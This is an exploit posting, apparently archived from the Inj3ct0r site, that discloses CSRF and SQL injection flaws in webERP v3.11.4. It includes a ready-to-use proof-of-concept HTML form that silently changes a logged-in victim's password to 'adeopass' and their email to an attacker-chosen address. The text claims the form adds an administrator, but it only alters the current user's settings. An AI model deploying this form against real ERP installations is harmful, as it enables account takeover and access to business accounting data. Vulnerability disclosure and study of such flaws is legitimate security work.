<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>webERP v3.11.4 Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
webERP v3.11.4 Multiple Vulnerabilities
=======================================

# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor: http://www.weberp.org

# Description: &quot;webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it.There are on average 5,000 downloads per month.&quot;

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr

# Vulnerabilities:
1) CSRF: Attacker can add new administrator to the system. All files
have this issue. See #PoC section.
2) SQL Injection: Application offer disable the magic_quotes_gpc.
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP
Requests must filtered.

# PoC (CSRF):
&lt;html&gt;
&lt;body&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://server/UserSettings.php?&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;RealName&quot; VALUE=&quot;ADEO-Security&quot;&gt;
&lt;input type=’hidden’ name=’DisplayRecordsMax’ VALUE=&quot;10&quot;&gt;
&lt;input type=’hidden’ name=’Language’ VALUE=’en_US’&gt;
&lt;input type=’hidden’ name=’Theme’ VALUE=’green’&gt;
&lt;input type=’hidden’ name=’pass’ value=’adeopass’&gt;
&lt;input type=’hidden’ name=’passcheck’ value=’adeopass’&gt;
&lt;input type=’hidden’ name=’email’ size=40 value=’hacked@weberp.org’&gt;
&lt;input type=’hidden’ name=’Modify’ value=&quot;Modify&quot;&quot;&gt;&lt;/div&gt;
&lt;/form&gt;

&lt;/body&gt;
&lt;/html&gt;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-06-30]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/12964